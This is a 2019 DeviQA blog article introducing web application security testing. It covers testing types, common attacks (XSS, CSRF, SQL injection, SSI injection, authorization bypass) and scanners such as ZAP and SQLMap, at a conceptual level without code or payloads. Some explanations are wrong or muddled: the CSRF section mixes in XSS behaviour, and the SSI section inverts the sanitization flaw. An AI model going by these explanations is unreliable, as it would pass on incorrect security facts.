How to make security testing for web applications | DeviQA
LogoDeviQA is the finalist of the Software Testing Award 2019

How to make security testing for web applications

By on 2019-05-20T00:00:00.000Z

Online transactions have increased rapidly making security testing one of the most critical area of web applications testing. Security testing of any system is about finding all potential loopholes, unprovided activities and weaknesses of the system which might result a loss of information. Unprovided activities can be either purposeful or unintentional. The aim of web security testing is to identify the danger in the system and determine its possible vulnerabilities. It also helps in detecting all possible security risks in the system and help developers to fix these problems through coding.

There are seven types of security testing. They are:

Vulnerability Scanning: This one scans a system against known vulnerability signatures through automated software.

Security Scanning: It identifies network and system drawbacks, and later provides settlements for reducing these risks. This scanning might be performed either for manual or for automated scanning.

Penetration testing: It simulates an attack from a malicious hacker and holds analysis of a peculiar system to check for potential vulnerabilities to an outer hacking attempt.

Risk Assessment: This testing involves analysis of security risks that are observed in the organization. Risks are ranked as low, medium and high. Risk assessment recommends controls and measures to cut the risk.

Security Auditing: This is an internal review of applications and operating systems for security errors.

Posture Assessment: This unites Security scanning, Ethical Hacking and Risk Assessments to display an overall security posture of an organization.

Ethical hacking: It means hacking an organization software systems. The aim is to reveal security errors in the system.

Also, there are several threats in security testing for web application.

Cross-site Scripting (XSS) Attack

It refers to client-side code injection attack. An attacker can perform malicious scripts (also commonly referred to as a malicious payload) into a harmful website or web app. It happens when a web application uses unvalidated or uncoded user input. Victim is not the direct target. A vulnerability within a website (web application) that victim will use is the main target. Victim's browser will be delivered malicious scripts.VBScript, ActiveX and Flash are exposed to it but most of all JavaScript.

As you see the XSS attack needs three factors — the website, the victim and the attacker.

XSRF / CSRF (Request Forgery)

An XSRF attack is carried out by stealing the identity of the user and hacking into a web server using the identity. Sensitive data can be returned to the intruder by sending Hypertext Transfer Protocol (HTTP) requests. It is opposition to the XSS Attack as hacker inserts malicious coding into a link of the web site that seems to be trustworthy resource. When end user clicks on the link, the embedded programming is submitted as part of the client's web request and can execute on the user's computer. Intruder is allowed to obtain cookies and other authentication data using client-side script.

SQL Injection (SQLi)

This tool for web application security testing is referred to code injection. This means that attacker can execute malicious SQL statements that control a web database of application server (also commonly referred to as a Relational Database Management System – RDBMS). An attacker is able to bypass the web app with the help of SQL Injection vulnerability. SQL Injection can also be used to add, modify and delete records in a database, affecting data integrity. SQL Injection can provide an attacker with unauthorized access to sensitive data including, customer data, personally identifiable information (PII), trade secrets, intellectual property and other sensitive information.

Server-Side Includes (SSI) Injection

It is a server-side exploit technique that makes possible to send code into a web application, which will be executed locally by the web server. Data is sanitized before inserting into a server-side interpreted HTML file. If an attacker submits a Server-side Include validation, he may have the opportunity to execute arbitrary operating system commands, or include a restricted contents of files when page is served. This is performed at the permission level of the web server user.

Authorization Bypass

Negligence, ignorance, or simple understatement of security threats can be bypassed by skipping the login page and calling an internal page directly (it should be accessed only after authentication has been performed). It is possible to bypass authentication measures by manipulating with requests and tricking the app into thinking that we're already authenticated. This can be accomplished either by modifying the given URL parameter or by manipulating the forms of counterfeiting sessions.

How to perform a website security test?

Security testing is a process that is performed with the intention of revealing errors in security mechanisms and finding the vulnerabilities or weaknesses of software applications. Generally, security testing must have next features: authentication, authorization, confidentiality, availability, integrity, non-repudiation.

When performing security testing for web application focus on these four areas:

Network security: This means seeking out vulnerabilities in the network infrastructure (resources and policies).

System software security: This one holds allotting weaknesses in the various software (operating system, database system) the application depends on.

Client-side application security: This deals with ensuring that the client (browser or any other tools) cannot be manipulated.

Server-side application security: This means making sure that the server code and its technologies are robust enough to avert any intrusion.

Let us consider some security testing tools for web application.

Vega – This vulnerability scanning and testing tool is used for detecting web application vulnerabilities like SQL injection, header injection, cross site scripting and so on. It is written in Java and can work with OS X, Linux and Windows platforms. This one is good at finding and validating SQL Injection, Cross-Site Scripting (XSS), inadvertently disclosed sensitive information and other vulnerabilities.Vega also probes for TLS / SSL security settings and identifies opportunities for improving the security of your TLS servers.

ZED Attack Proxy (ZAP) – This tool works with Windows, Unix/Linux and Macintosh platforms. It is used as a scanner or for snapping a proxy to test a web page manually.

Wapiti – This tool for web application security testing performs a black box scan and injects payloads to check if a script is attackable. It holds up both GET and POST HTTP attack methods. It detects such vulnerabilities as file Disclosure, file inclusion, cross Site Scripting (XSS), etc.

SQLMap – Supports directly connection to the database without passing via a SQL injection.It is performed by providing DBMS credentials, IP address, port and database name.It also provides automatic recognition of password hash formats and support cracking them by using a dictionary-based attack.

Google Nogotofail - This tool helps to spot and fix weak TLS/SSL connections and sensitive cleartext traffic on devices and apps in a flexible, scalable, powerful way. It holds testing for common SSL certificate verification issues, HTTPS and TLS/SSL library bugs, SSL and STARTTLS stripping issues, cleartext issues, etc.Nogotofail depends only on Python 2.7 and pyOpenSSL>=0.13. It is designed to work on Linux machines and the transparent traffic capture modes are Linux specific and require iptables as well. The one may set up it as a router, VPN server or proxy server.

Keep in mind that security testing of web applications is more effective in identifying potential vulnerabilities when it is performed regularly. Security testing is very important in IT industry to protect data by all means.